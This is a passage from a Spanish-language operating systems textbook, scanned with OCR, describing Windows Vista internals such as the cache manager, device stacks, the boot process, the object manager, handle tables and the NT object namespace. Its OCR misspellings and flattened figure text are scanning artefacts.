ciales para aplicaciones de servidor extensas, como las bases de datos y los componentes en tiem¬ 
po de ejecución de los lenguajes de programación, tales como los recolectores de basura. En la 
sección 11.5 estudiaremos la administración de la memoria. 

El administrador deia caché optimiza el rendimiento de la E/S para el sistema de archivos, 
para lo cual mantiene una caché de páginas del sistema de archivos en el espacio de direcciones vir¬ 
tuales del kernel. El administrador de la caché utiliza caché con direcciones virtuales: es decir, or¬ 
ganiza las páginas de las caché con base en su ubicación en sus archivos. Esto difiere de la caché 
de bloques físicos, como en UNIX, donde el sistema mantiene una caché de los bloques con direc¬ 
ciones físicas del volumen de disco puro. 

La administración de la caché se implementa mediante el uso de la asignación en memoria de 
los archivos: el uso actual de la caché lo hace mediante el administrador de memoria. El adminis¬ 
trador de la caché tiene que preocuparse sólo por decidir qué partes de qué archivos debe poner en 
caché, con lo cual asegura que los datos en la caché se vacíen en el disco en forma oportuna, y ad¬ 
ministra las direcciones virtuales del kernel que se utilizan para asignar las páginas de archivos en 
caché. Si se requiere una página para una operación de E/S en un archivo y no está en la caché, se 
producirá un fallo de página y se traerá la página requerida mediante el administrador de memoria. 
En la sección 11.6 estudiaremos el administrador de la caché. 

El monitor de referencia de seguridad implementa los elaborados mecanismos de seguridad 
de Windows, los cuales aplican los estándares internacionales para seguridad computacional, cono¬ 
cidos como Criterios comunes, una evolución de los requerimientos de seguridad del Libro na¬ 
ranja del Departamento de Defensa de los Estados Unidos. Estos estándares especifican una gran 
cantidad de reglas que debe cumplir un sistema para estar en conformidad, como el inicio de sesión 
autenticado, las auditorías, la puesta a cero de la memoria asignada y muchas más. Una de las re¬ 
glas requiere que todas las comprobaciones de acceso se implementen mediante un solo módulo 
dentro del sistema. En Windows, este módulo es el monitor de referencia de seguridad en el kernel. 
En la sección 11.9 estudiaremos con más detalle el sistema de seguridad. 

El ejecutivo contiene varios componentes más que analizaremos en breve. El administrador 
de configuración es el componente el ejecutivo que implementa el registro, como vimos antes. El 
registro contiene datos de configuración para el sistema, en archivos del sistema conocidos como 
grupo masivo de archivos (hives). El grupo masivo de archivos más crítico es SYSTEM , el cual se 
carga en memoria al momento de iniciar el sistema. Sólo hasta después de que el nivel ejecutivo 
inicializa con éxito sus componentes clave (incluyendo los drivers de E/S que se comunican con el 
disco del sistema) es cuando se vuelve a asociar la copia en memoria del grupo masivo de archivos 
con la copia en el sistema de archivos. Por lo tanto, si sale algo mal a la hora de tratar de iniciar el 
sistema, es mucho menos probable que se corrompa la copia en el disco. 

El componente LPC ofrece una comunicación entre procesos muy eficiente, la cual se utiliza 
entre los procesos que se ejecutan en el mismo sistema. Es uno de los transportes de datos que uti¬ 
liza la herramienta de llamadas a procedimientos remotos (RPC) basada en los estándares para im- 
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plementar el modelo de computación cliente/servidor. La RPC también utiiiza tuberías con nombres 
y ei TCP/IP como transportes. 

En Windows Vista se mejoró ei componente LPC de manera consi derabie (ahora se ie conoce 
como ALPC, o LPC avanzado) para admitir ias nuevas características en ia RPC, inciuyendo ia 
RPC de ios componentes en modo de kernei, como ios drivers. LPC era un componente crítico en 
ei diseño originai de NT, debido a que ei nivei dei subsistema io utiiiza para impiementar ia comu¬ 
nicación entre ias rutinas de resguardo (stub) de ia bibiioteca que se ejecutan en cada proceso, y ei 
proceso dei subsistema que impiementa ias herramientas comunes para una personaiidad específi¬ 
ca dei sistema operativo, como Win32 o POSIX. 

En Windows NT 4.0, gran parte dei código reiacionado con ia interfaz gráfica deWin32 setras- 
iadó ai kernei, debido a que ei hardware que en ese entonces era actuai no podía ofrecer ei rendi¬ 
miento requerido. Este código residía antes en ei proceso dei subsistema crss.exe, que impiementaba 
ias interfaces de Win32. Ei código de GUI basado en el kernei reside en un driver especial, 
win32k.sys. Se esperaba que este cambio mejorara el rendimiento de Win32, debido a que se habían 
eliminado las transiciones adicionales del modo de usuario al modo de kernei y el costo de cambiar 
los espacios de direcciones para impiementar la comunicación a través del componente LPC. Pero 
no ha tenido el éxito esperado, ya que los requerimientos para el código que se ejecuta en el kernei 
son demasiado estrictos y la sobrecarga adicional de la ejecución en modo de kernei contrarresta al¬ 
gunas de las ganancias que se obtienen al reducir los costos. 


Los drivers de dispositivos 

La parte final de la figura 11-13 consiste en los drivers de dispositivos. En Windows, estos drivers 
son bibliotecas de vínculos dinámicos que se cargan mediante el ejecutivo de NTOS. Aunque su 
principal uso es para impiementar los drivers para el hardware específico, como los dispositivos fí¬ 
sicos y los buses de E/S, el mecanismo del driver de dispositivo también se utiliza como mecanis¬ 
mo de extensi bilí dad general para el modo de kernei. Como vimos antes, la mayor parte del 
subsistema deWin32 se carga como driver. 

El administrador de E/S organiza una ruta de flujo de datos para cada instancia de un disposi¬ 
tivo, como se muestra en la figura 11-16. A esta ruta se le conoce como pila de dispositivos, y con¬ 
siste en instancias privadas de objetos de dispositivo del kernei que se asignan para la ruta. Cada 
objeto de dispositivo en la pila de dispositivos se vincula con un objeto driver específico, el cual 
contiene la tabla de rutinas a utilizar para los paquetes de peticiones de E/S que fluyen a través de 
la pila de dispositivos. En algunos casos, los dispositivos en la pila representan drivers cuyo único 
propósito es filtrar las operaciones de E/S orientadas a un dispositivo, bus, o driver de red especí¬ 
fico. El filtrado se utiliza por varias razones. Algunas veces, mediante el preprocesamiento o pos¬ 
procesamiento de las operaciones de E/S se obtiene una arquitectura más limpia, mientras que otras 
veces es sólo pragmático debido a que el código fuente o los permisos para modificar un driver no 
están disponibles, y se utiliza el filtrado como solución alterna. Los filtros también pueden imple- 
mentar una funcionalidad completamente nueva, como convertir discos en particiones o varios dis¬ 
cos en volúmenes RAID. 
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Figura 11-16. Representación simplificada de las pilas de dispositivos para dos volú¬ 
menes de archivos NTFS. EL paquete de peticiones de E/S se pasa desde la parte infe¬ 
rior de la pila. Se hacen llamadas a las rutinas apropiadas de los drivers asociados en 
cada nivel de la pila. Las mismas pilas de dispositivos consisten en objetos de disposi¬ 
tivo que se asignan de manera específica a cada pila. 


Los sistemas de archivos se cargan como drivers. Para cada instancia de un volumen para un 
sistema de archivos se crea un objeto de dispositivo como parte de la pila de dispositivos para ese 
volumen. Este objeto de dispositivo se vinculará al objeto de driver para el sistema de archivos que 
sea apropiado para el formato de ese volumen. Los drivers de filtros especiales, conocidos como 
drivers de filtros del sistema de archivos, pueden insertar objetos de dispositivo antes del objeto 
de dispositivo del sistema de archivos, para aplicar la funcionalidad a las peticiones de E/S que se 
envían a cada volumen, como la inspección de los datos que se leen o escriben para asegurar que 
no tengan virus. 

Los protocolos de red, como la implementación IPv4/IPv6 TCP/IP integrada en Windows Vis¬ 
ta, también se cargan como drivers mediante el uso del modelo de E/S. Para tener compatibilidad 
con los Windows anteriores basados en M S-DOS, el driver de TCP/IP implemento un protocolo es¬ 
pecial para comunicarse con las interfaces de red encima del modelo de E/S de Windows. Hay otros 
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drivers que también impiementan dichos arregios, a ios cuaies Windows Íes iiama minipuertos. La 
funcionaiidad compartida está en un driver de ciase. Porejempio, un driver de ciase suministra iafun- 
cionaiidad común para ios discos SCSI o IDE, o para los dispositivos USB, y los drivers de minipuer¬ 
tos crean un vínculo a estos drivers de clase para cada tipo específico de dichos dispositivos como 
una biblioteca. 

En este capítol o no analizaremos ningún driver de dispositivo específico, pero en la sección 11.7 
proporcionaremos más detalles sobre la forma en que el administrador de E/S interactúa con los dri¬ 
vers de dispositivos. 

11.3.2 Booteo de Windows Vista 

Para hacer que se ejecute un sistema operativo se requieren varios pasos. Cuando se enciende una 
computadora, el hardware inicializa la CPU y después empieza a ejecutar un programa en memo¬ 
ria. Pero el único código disponible está en cierta forma de CM OS volátil que el fabricante de la 
computadora inicializa (y algunas veces el usuario la actualiza, en un proceso conocido como 
flashing). En la mayoría de las PCs, este programa inicial es el BIOS (Basic Input/Output Sys¬ 
tem, Sistema básico de entrada/salida), el cual sabe cómo comunicarse con los tipos estándar de 
dispositivos que se encuentran en una PC. Para iniciar Windows Vista, el BIOS primero carga 
pequeños programas tipo "bootstrap" que se encuentran al inicio de las particiones de la unidad de 
disco. 

Los programas bootstrap saben cómo leer suficiente información de un volumen del sistema de 
archivos para encontrar el programa BootMgr independiente de Windows en el directorio raíz. 
BootM gr determina si el sistema había hibernado antes o si estaba en modo suspendido (modos es¬ 
peciales de ahorro de energía, los cuales permiten volver a encender el sistema sin tener que ini¬ 
ciarlo). De ser así, BootMgr carga y ejecuta WinResume.exe. En caso contrario, carga y ejecuta 
WinLoad.exe para realizar un inicio desde cero. WinLoad carga los componentes de inicio del sis¬ 
tema en la memoria: el kernel/ejecutivo (por lo general es ntoskrnl.exe), el HAL (hal.dll), el archi¬ 
vo que contiene el grupo masivo de archivos SY STEM , el driver Win32k.sys que contiene las partes 
del subsistema de Win32 en modo de kernel, y también las imágenes de los otros drivers listados 
en el grupo masivo de archivos SY STEM como drivers de booteo, lo cual significa que se necesi¬ 
tan cuando el sistema arranca. 

Una vez que se cargan los componentes de inicio de Windows en la memoria, se proporciona 
el control al código de bajo nivel en NTOS, el cual procede a inicializar los niveles del HAL, del 
kernel y del ejecutivo, vincula las imágenes de los drivers y utiliza/actualiza los datos de configu¬ 
ración en el grupo masivo de archivos SY STEM . Una vez que se inicializan todos los componen¬ 
tes en modo de kernel, se crea el primer proceso en modo de usuario que se utiliza para ejecutar el 
programa smss.exe (que es como /etc/init en los sistemas UNIX). 

Los programas de inicio de Windows tienen lógica para lidiar con los problemas comunes que 
se encuentran los usuarios cuando falla el inicio del sistema. Algunas veces, la instalación de un dri¬ 
ver de dispositivo defectuoso o la ejecución de un programa como regedit (que puede corromper el 
grupo masivo de archivos SY STEM ) evitan que el sistema se inicie de manera normal. Hay sopor¬ 
te para ignorar los cambios recientes e iniciar con la última configuración válida conocida del 
sistema. Otras opciones de inicio incluyen el booteo seguro, el cual desactiva muchos drivers 
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opcionales, y la consola de recuperación, que activa una ventana cmd.exe de línea de comandos, 
la cual proporciona una experiencia similar al modo de un solo usuario en UNIX. 

Otro problema común para los usuarios es que, en ocasiones, algunos sistemas Windows pa¬ 
recen ser muy quebradizos, con fallas frecuentes (al parecer, aleatorias) tanto del sistema como de 
las aplicaciones. Los datos que se toman del programa Análisis de fallas en línea de M icrosoft 
muestran evidencia de que muchas de estas fallas se deben a una memoria física defectuosa, por 
lo que el proceso de inicio en Windows Vista ofrece la opción de ejecutar un diagnóstico de me¬ 
moria exhaustivo. Tal vez el futuro hardware de la PC tenga soporte común para la ECC (o tal vez 
paridad) de la memoria, pero la mayoría de los sistemas de escritorio y portátiles en la actualidad 
son vulnerables, incluso a los errores de un solo bit, en los miles de millones de bits de memoria 
que contienen. 

11.3.3 I mplementadón del administrador de objetos 

Probablemente el administrador de objetos es el componente individual más importante en el ejecu¬ 
tivo de Windows, razón por la cual ya hemos introducido muchos de sus conceptos. Como dijimos 
antes, proporciona una interfaz uniforme y consistente para administrarlos recursos del sistema y las 
estructuras de datos, como archivos abiertos, procesos, hilos, secciones de memoria, temporizadores, 
dispositivos, drivers y semáforos. El administrador de objetos también maneja objetos aun más es¬ 
pecializados que representan cosas como transacciones del kernel, perfiles, tokens de seguridad y 
escritorios de Win32. Los objetos de dispositivos vinculan las descripciones del sistema deE/S en¬ 
tre sí, y también proporcionan el vínculo entre el espacio de nombres de NT y los volúmenes del sis¬ 
tema de archivos. El administrador de configuración utiliza un objeto de tipo Key para crear los 
vínculos en los grupos masivos de archivos del registro. El mismo administrador de objetos tiene ob¬ 
jetos que utiliza para administrar el espacio de nombres de NT e implementar objetos que utilicen 
una herramienta común. Éstos son objetos de directorio, vínculo simbólico y de tipo objeto. 

La uniformidad que proporciona el administrador de objetos tiene varias facetas. Todos estos 
objetos utilizan el mismo mecanismo para su creación, destrucción y contabilización en el sistema 
de cuotas. Todos se pueden utilizar desde procesos en modo de usuario mediante el uso de maneja- 
dores. Hay una convención unificada para administrar referencias de apuntadores a objetos desde 
el interior del kernel. Los objetos pueden recibir nombres en el espacio de nombres de NT (el cual 
es manejado por el administrador de objetos). Los objetos despachadores (objetos que empiezan 
con la estructura de datos común para señalar eventos) pueden utilizar interfaces comunes de sin¬ 
cronización y notificación, como waitForMuitipieObjects. Está el sistema de seguridad común con 
ACLs, que se implemento en los objetos que se abren por nombre, y las comprobaciones de acce¬ 
so en cada uso de un manejador. Hay incluso herramientas para ayudar a los desarrolladores en mo¬ 
do de kernel a depurar los problemas mediante el rastreo del uso de los objetos. 

U na clave para comprender los objetos es tener en cuenta que un objeto (ejecutivo) es sólo una 
estructura de datos en la memoria virtual, accesible para el modo de kernel. Estas estructuras de datos 
se utilizan comúnmente para representar conceptos más abstractos. Por ejemplo, se crean objetos de 
archivos del ejecutivo para cada instancia de un archivo del sistema de archivos que se haya abierto. 
Los objetos de procesos se crean para representar cada proceso. 
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U na consecuencia del hecho de que los objetos sean sólo estructuras de datos del kernel es que 
cuando el sistema se reinicia (o falla), se pierden todos ellos. Cuando el sistema arranca no hay ob¬ 
jetos presentes, ni siquiera los descriptores de tipo de los objetos. Todos los tipos de objetos (y los 
objetos mismos) se tienen que crear en forma dinámica mediante otros componentes del nivel eje¬ 
cutivo, para lo cual se hace una llamada a las interfaces que proporciona el administrador de objetos. 
Cuando se crean objetos y se especifica un nombre, se puede hacer referencia a ellos más adelante 
a través del espacio de nombres de NT. Por lo tanto, al crear los objetos cuando el sistema se inicia 
también se crea el espacio de nombres de NT. 

Los objetos tienen una estructura, como se muestra en la figura 11-17. Cada objeto contiene un 
encabezado con cierta información común para todos los objetos de todos los tipos. Los campos en 
este encabezado incluyen el nombre del objeto, el directorio en el que existe en el espacio de nom¬ 
bres de NT, y un apuntador a un descriptor de seguridad que representa la ACL para el objeto. 


Encabezado 
del objeto < 


Datos del y 
objeto ^ 


Nombre del objeto 


Directorio en el que vive el objeto 

Información de seguridad (que el objeto puede utilizar) 

Cargos de cuota (costo por utilizar el objeto) 

Lista de procesos con manejadores 

Conteos de referencia 

Apuntador al objeto de tipo 


Nombre del tipo 

Datos específicos del objeto 

Tipos de acceso 

Permisos de acceso 

Cargos de cuota 

zSe puede sincronizar? 

Se puede paginar 

Método para abrir 
Método para cerrar 
Método para eliminar 
Método para consultar 
el nombre 

Método para analizar 
Método de seguridad 




Figura 11-17. La estructura de un objeto del ejecutivo administrado por el adminis¬ 
trador de objetos. 

La memoria que se asigna a los objetos proviene de uno de dos montículos (o reservas) de me¬ 
moria mantenidos por el nivel ejecutivo. Son funciones utilitarias (como malloc) en el ejecutivo, 
que permiten a los componentes en modo de kernel asignar memoria paginable del kernel o memo¬ 
ria no paginable de kernel. La memoria no paginable se requiere para cualquier estructura de datos 
u objeto en modo del kernel que tal vez se tenga que utilizar desde un nivel de prioridad de la CPU 
de 2 o más. Esto incluye a las ISRs y DPCs (pero no las APCs), y al mismo planificador de hilos. 
El manejador de fallos de página también requiere asignar sus estructuras de datos desde la memo¬ 
ria de kernel no paginable, para evitar la recursividad. 

La mayoría de las asignaciones del administrador del montículo del kernel se obtienen median¬ 
te el uso de listas de búsqueda lateral (lookaside), que contienen listas LIFO (UEPS) de asignacio¬ 
nes del mismo tamaño. Estas listas se optimizan para una operación sin bloqueos, con lo cual se 
mejoran el rendimiento y la escalabilidad del sistema. 
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El encabezado de cada objeto contiene un campo de cargo por cuota, que es lo que se cobra a 
un proceso por abrir el objeto. Las cuotas se utilizan para evitar que un usuario utilice demasiados 
recursos del sistema. Hay límites separados para la memoria del kernel no paginadle (que requiere 
la asignación de memoria física y de direcciones virtuales del kernel) y la memoria del kernel no 
paginadle (que utiliza direcciones virtuales del kernel). Cuando los cargos acumulados para cual¬ 
quiera de los dos tipos de memoria llegan al límite de la cuota, las asignaciones para ese proceso 
fallan debido a que los recursos son insuficientes. El administrador de memoria también utiliza cuo¬ 
tas para controlar el tamaño del conjunto de trabajo, y el administrador de hilos las utiliza para li¬ 
mitar la proporción de uso de la CPU. 

Tanto la memoria física como las direcciones virtuales del kernel son recursos valiosos. Cuan¬ 
do ya no se necesita un objeto, hay que eliminarlo y reclamar su memoria y direcciones. Pero si se 
reclama un objeto cuando todavía está en uso, entonces la memoria se podría asignar a otro objeto 
y es muy probable que las estructuras de datos se corrompan. Es fácil que esto ocurra en el nivel 
ejecutivo de Windows, debido a que en su mayor parte es multihilo e implementa muchas opera¬ 
ciones asincronas (funciones que regresan al proceso que las llamó antes determinar su trabajo en 
las estructuras de datos que reciben). 

Para evitar liberar objetos antes de tiempo debido a condiciones de competencia, el adminis¬ 
trador de objetos implementa un mecanismo de conteo de referencias, y el concepto de un apunta¬ 
dor referenciado. Este tipo de apuntador se requiere para acceder a un objeto, siempre que éste se 
encuentra en peligro de ser eliminado. Dependiendo de las convenciones relacionadas con cada ti¬ 
po de objeto específico, sólo hay ciertos momentos en los que otro hilo podría llegar a eliminar un 
objeto. En otros momentos, el uso de los bloqueos, las dependencias entre las estructuras de datos 
e incluso el hecho de que ningún otro hilo tiene un apuntador a un objeto, son suficientes para evi¬ 
tar que el objeto se elimine en forma prematura. 

Manej adores 

Las referencias en modo de usuario a los objetos en modo de kernel no pueden utilizar apuntado¬ 
res, ya que es muy difícil validarlos. En vez de ello, los objetos en modo de kernel se deben deno¬ 
minar de alguna otra forma, para que el código del usuario pueda hacer referencia a ellos. Windows 
utiliza manejadores para hacer referencia a los objetos en modo de kernel. Los manejadores son 
valores opacos que el administrador de objetos convierte en referencias a la estructura de datos es¬ 
pecífica en modo de kernel que representa a un objeto. La figura 11-18 muestra la estructura de da¬ 
tos de la tabla de manejadores que se utiliza para traducir los manejadores en apuntadores a objetos. 
La tabla de manejadores se puede expandir si se agregan niveles adicionales de indirección. Cada 
proceso tiene su propia tabla, incluyendo el proceso del sistema, el cual contiene todos los hilos del 
kernel que no están asociados con un proceso en modo de usuario. 

En la figura 11-19 se muestra una tabla de manejadores con dos niveles adicionales de indirec¬ 
ción, el máximo admitido. Algunas veces es conveniente para el código que se ejecuta en modo de 
kernel poder utilizar manejadores, en vez de apuntadores referenciados. A éstos se les conoce co¬ 
mo manejadores del kernel, y se codifican de manera especial para poder distinguirlos de los ma¬ 
nejadores en modo de usuario. Los manejadores del kernel se mantienen en la tabla de manejadores 
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Descriptor de A: Entradas en la tabla 

tabla de manejadores de manejadores [512] 



Figura 11-18. Estructuras de datos de la tabla de manejadores para una tabla simpli¬ 
ficada, que utiliza una sola página de hasta 512 manejadores. 

de los procesos del sistema, y no se puede acceder a ellos desde el modo de usuario. Al igual que 
se comparte casi todo el espacio de direcciones virtuales del kernel entre todos los procesos, la ta¬ 
bla de manejadores del sistema se comparte entre todos los componentes del kernel, sin importar 
cuál sea el proceso actual en modo de usuario. 


Descriptor de tabla 

de manejadores D: Apuntadores en la tabla de manejadores [32] 



Figura 11-19. Estructuras de datos de la tabla de manejadores para una tabla máxima 
de hasta 16 millones de manejadores. 

Los usuarios pueden crear objetos o abrir los objetos existentes mediante las llamadas a Win32, 
como createsemaphore u Opensemaphone. Éstas son llamadas a procedimientos de la biblioteca 
que en última instancia producen las llamadas apropiadas al sistema. El resultado de cualquier lla¬ 
mada exitosa para crear o abrir un objeto es una entrada en la tabla de manejadores de 64 bits, que 
se almacena en la tabla de manejadores privada del proceso en la memoria del kernel. El índice de 
32 bits de la posición lógica del manejador en la tabla se regresa al usuario, para que la utilice en las 
posteriores llamadas. La entrada en la tabla de manejadores de 64 bits en el kernel contiene dos pa¬ 
labras de 32 bits. Una palabra contiene un apuntador de 29 bits al encabezado del objeto. Los 3 bits 
de menor orden se utilizan como banderas (por ejemplo, si el manejador es heredado por los proce¬ 
sos que crea). Estos 3 bits se enmascaran antes de que siga el apuntador. La otra palabra contiene una 
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máscara de permisos de 32 bits. Es necesaria debido a que ia comprobación de permisos se reaiiza 
sóio ai momento de crear o abrir ei objeto. Si un proceso sóio tiene permiso de iectura para un obje¬ 
to, todos ios demás bits de permisos en ia máscara serán 0, con io cuai ei sistema operativo podrá re¬ 
chazar cuaiquier operación en ei objeto que no sea de iectura. 

EI espacio de nombres de objetos 

Los procesos pueden compartir objetos, para io cuai un proceso tiene que dupiicar un manejador 
para ei objeto en ios demás procesos. Pero para eiio se requiere que ei proceso dupiicador tenga ma¬ 
nejadoras para ios otros procesos, y por ende no es práctico en muchas situaciones, como cuando 
ios procesos que comparten un objeto no están reiacionados, o están protegidos uno dei otro. En 
otros casos, es importante que ios objetos persistan aun cuando ningún proceso ios utiiice, como ios 
objetos de dispositivo que representan dispositivos físicos, o ios voiúmenes montados, o ios obje¬ 
tos que se utiiizan para impiementar ei administrador de objetos y ei mismo espacio de nombres de 
NT. Para iidiar con ios requerimientos de compartición y persistencia en generai, ei administrador 
de objetos permite que objetos arbitrarios reciban nombres en ei espacio de nombres de NT ai mo¬ 
mento de su creación. Sin embargo, es responsabiiidad dei componente dei ejecutivo que manipuia 
objetos de cierto tipo proveer ias interfaces que admitan ei uso de ias herramientas de denominación 
dei administrador de objetos. 

Ei espacio de nombres de NT es jerárquico, y ei administrador de objetos impiementa ios di¬ 
rectorios y víncuios simbóiicos. Ei espacio de nombres también es extensibie, ya que permite que 
cuaiquier tipo de objeto especifique extensiones dei espacio de nombre, para io cuai tiene que pro¬ 
porcionar una rutina iiamada Parse. La rutina Parse es uno de ios procedimientos que se pueden 
proveer para cada tipo de objeto ai momento de creado, como se muestra en ia figura 11-20. 


Procedimiento 

Cuándo se iiama 

Observaciones 

Open 

Para cada nuevo manejador 

Se utiliza raras veces 

Parse 

Para los tipos de objetos que 
extienden el espacio de nombres 

Se utiliza para archivos y claves del 
registro 

Glose 

Cuando se cierra el último 
manejador 

Limpia los efectos secundarios 
visibles 

Delete 

En la última desreferencia del 
apuntador 

El objeto está a punto de eliminarse 

Security 

Para obtener o establecer el 
descriptor de seguridad del objeto 

Protección 

QueryName 

Para obtener el nombre del objeto 

Se utiliza raras veces fuera del kernel 


Figura 11-20. Los procedimientos de objetos que se suministran cuando se especifica 
un nuevo tipo de objeto. 


Ei procedimiento Open se utiiiza raras veces, debido a que ei comportamiento predeterminado 
dei administrador de objetos es io que comúnmente se necesita, y por io tanto ei procedimiento se 
especifica como N U L L para casi todos ios tipos de objetos. 











SECCION 11.3 


ESTRUCTURA DEL SISTEMA 


853 


L os procedí mi entos CI ose y D el ete representan di sti ntas fases de termi nar con un obj eto. Cuan¬ 
do se cierra el último manejador para un objeto, puede haber acciones necesarias para limpiar el es¬ 
tado, de lo cual se encarga el procedimiento Cióse. Cuando se elimina la última referencia del 
apuntador del objeto, se hace una llamada al procedimiento Del ete para poder preparar el objeto pa¬ 
ra ser eliminado, y reutilizar su memoria. Con los objetos de archivos, estos dos procedimientos se 
implementan como llamadas de retorno (callbacks) en el administrador de E/S, el componente que 
declaró el tipo del objeto de archivo. Las operaciones del administrador de objetos producen ope¬ 
raciones de E/S correspondientes que se envían hacia la pila de dispositivos asociada con el objeto 
de archivo, y el sistema de archivos realiza la mayor parte del trabajo. 

El procedimiento Parse se utiliza para abrir o crear objetos, como los archivos y las claves del 
registro, que extienden el espacio de nombres de NT. Cuando el administrador de objetos trata de 
abrir un objeto por su nombre y encuentra un nodo hoja en la parte del espacio de nombres que ad¬ 
ministra, comprueba para ver si el tipo del objeto nodo hoja ha especificado un procedimiento Par¬ 
se. De ser así, invoca al procedimiento y le pasa cualquier parte no utilizada del nombre de ruta. Si 
utilizamos de nuevo objeto de archivos como ejemplo, el nodo hoja es un objeto de dispositivo que 
representa un volumen específico en el sistema de archivos. El proceso Parse se implementa me¬ 
diante el administrador de E/S, y produce una operación de E/S para que el sistema de archivos lle¬ 
ne un objeto de archivo que haga referencia a una instancia abierta del archivo al que se refiere el 
nombre de ruta en el volumen. A continuación exploraremos este ejemplo específico, paso a paso. 

El procedimiento QueryName se utiliza para buscar el nombre asociado con un objeto. El pro¬ 
cedimiento Security se utiliza para obtener, establecer o eliminar los descriptores de seguridad en 
un objeto. Para la mayoría de los tipos de objetos, este procedimiento se proporciona como un pun¬ 
to de entrada estándar en el componente M onitor de Referencia de Seguridad del ejecutivo. 

Observe que los procedimientos en la figura 11-20 no realizan las operaciones más interesan¬ 
tes para cada tipo de objeto. M ás bien proporcionan las funciones de llamadas de retorno que el ad¬ 
ministrador de objetos necesita para implementar funciones de manera correcta, como las que 
proporcionan el acceso a los objetos y los limpian cuando terminan de usarlos. A demás de estas lla¬ 
madas de retorno, el administrador de objetos también proporciona un conjunto de rutinas de obje¬ 
tos genéricos, para operaciones como crear objetos y tipos de objetos, duplicar manejadoras, 
obtener un apuntador referenciado a partir de un manejador o nombre, y agregar y restar contaos de 
referencia al encabezado del objeto. 

Las operaciones interesantes en los objetos son las llamadas al sistema de la API nativa de NT, 
como las que se muestran en la figura 11-9: NtcreateProcess, NtcreateFiie o Ntciose (la función 
genérica que cierra todos los tipos de manejadoras). 

A unque el espacio de nombres de objetos es crucial para la operación completa del sistema, po¬ 
cas personas saben siquiera que existe, debido a que no es visible para los usuarios sin herramien¬ 
tas de visualización especiales. Una de esas herramientas es winobj, disponible sin costo en 
www.microsoft.com/technet/sysinternals. Al ejecutar esta herramienta se describe un espacio de 
nombres de objetos que por lo general contiene los directorios de objetos que se listan en la figura 
11-21, así como unos cuantos más. 

El directorio con el extraño nombre \?? contiene todos los nombres de dispositivos estilo 
M S-DOS, como A: para el disco flexible y C: para el primer disco duro. Estos nombres son en rea¬ 
lidad vínculos simbólicos al directorio\Device, en donde viven los objetos. Se eligió el nombre\?? 


854 


CASO DE ESTUDIO 2: WINDOWS VISTA 


CAPITULO 11 


Directorio 

Contenido 

?? 

Lugar iniciai para buscar dispositivos de MS-DOS como C: 

Dos Devices 

Nombre oficial de ??, pero en realidad sólo es un vínculo simbólico a ?? 

Device 

Todos los dispositivos de E/S descubiertos 

Driver 

Los objetos que corresponden a cada driver de dispositivo cargado 

ObjectTypes 

Los objetos de tipos, como los que se listan en la figura 1 f-22 

Windows 

Objetos para enviar mensajes a todas las ventanas de la GUI de Win32 

BaseNamedObjects 

Objetos de Win32 creados por el usuario, como semáforos, mutexes, etc. 

Arcname 

Nombres de las particiones descubiertas por el cargador de inicio 

NLS 

Objetos de Soporte de Lenguaje Nacional 

FileSystem 

Objetos de drivers del sistema de archivos y objetos del reconocedor del sistema 

de archivos 

Security 

Objetos que pertenecen al sistema de seguridad 

KnownDLLs 

Bibliotecas compartidas clave que se abren casi desde el principio y se mantienen 
abiertas 


Figura 11-21. Algunos directorios comunes en ei espacio de nombres de objetos. 

para que siempre estuviera primero en orden alfabético, y así poder agilizar la búsqueda de todos 
los nombres de rutas que empiecen con una letra de unidad. El contenido de los demás directorios 
de objetos se explica por sí solo. 

Como vimos antes, el administrador de objetos mantiene un conteo separado de manejadores 
en cada objeto, el cual nunca es mayor que el de apuntadores referenciados, ya que cada manejador 
válido tiene un apuntador referenciado al objeto en su entrada en la tabla de manejadores. La razón 
para el conteo separado de manejadores es que muchos tipos objetos tal vez necesiten limpiar su es¬ 
tado cuando desaparezca la última referencia en modo de usuario, aun cuando no estén listos toda¬ 
vía para eliminar su memoria. 

Un ejemplo de esto son los objetos de archivos, que representan una instancia de un archivo 
abierto. En Windows, los archivos se pueden abrir en modo de acceso exclusivo. Cuando se cierra 
el último manejador para un objeto de archivo, es importante eliminar el acceso exclusivo en ese 
punto, en vez de esperar que desaparezca cualquier referencia incidental al kernel en algún momen¬ 
to dado (por ejemplo, después del último vaciado de los datos de la memoria). En cualquier otro ca¬ 
so, tal vez los procesos de cerrar y volver a abrir un archivo desde el modo de usuario no funcionen 
como se espera, debido a que el archivo aún parece estar en uso. 

A unque el administrador de objetos tiene mecanismos extensos para administrar los tiempos de 
vida de los objetos dentro del kernel, ni lasAPIs de NT ni lasAPIs deWin32 proporcionan un me¬ 
canismo de referencia para lidiar con el uso de manejadores entre varios hilos concurrentes en mo¬ 
do de usuario. Por ende, muchas aplicaciones multihilo tienen condiciones de competencia y errores 
en donde cerrarán un manejador en un hilo antes determinar con él en otro hilo. O cerrarán un ma¬ 
nejador varias veces. O cerrarán un manejador que otro hilo esté utilizando todavía, y lo volverán 
a abrir para hacer referencia a un objeto distinto. 

Tal vez lasAPIs de Windows deberían haberse diseñado de manera que requirieran una fun¬ 
ción de la API para cerrar por tipo de objeto en vez de la operación Ntciose genérica. Por lo 
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menos eso habría reducido la frecuencia de los errores que se producen cuando los hilos en modo 
de usuario cierran los manejadoras incorrectos. Otra solución podría ser incrustar un campo de se¬ 
cuencia en cada manejador, además del índice en la tabla de manejadoras. 

Para ayudar a los escritores de aplicaciones a encontrar problemas como éstos en sus progra¬ 
mas, Windows tiene un verificador de apiicaciones que los desarrolladores de software pueden 
descargar de M icrosoft. El verificador de aplicaciones (al igual que el verificador de drivers que 
analizaremos en la sección 11.7) realiza una comprobación extensa de las reglas para ayudar a los 
programadores a encontrar errores que tal vez las pruebas ordinarias no podrían encontrar. También 
puede activar un ordenamiento tipo PIFO para la lista de manejadores libres, de manera que los ma- 
nejadores no se vuelvan a utilizar de inmediato (es decir, que desactive el ordenamiento LIFO con 
mejor rendimiento, que se utiliza por lo general para las tablas de manejadores). Al evitar que se 
vuelvan a utilizar los manejadores con rapidez, se transforman las situaciones en las que una ope¬ 
ración utiliza el manejador incorrecto en situaciones en las que se usa un manejador cerrado, lo cual 
es más fácil de detectar. 

El objeto de dispositivo es uno délos más importantes y versátiles en modo de kernel en el eje¬ 
cutivo. El tipo se especifica mediante el administrador de E/S, que junto con los drivers de dispo¬ 
sitivos, son los principales usuarios de los objetos de dispositivo. Éstos están muy relacionados con 
los drivers, y por lo general cada objeto de dispositivo tiene un vínculo a un objeto controlador es¬ 
pecífico, el cual describe cómo acceder a las rutinas de procesamiento de E/S para el driver que co¬ 
rresponde al dispositivo. 

Los objetos de dispositivo representan dispositivos de hardware, interfaces y buses, así como 
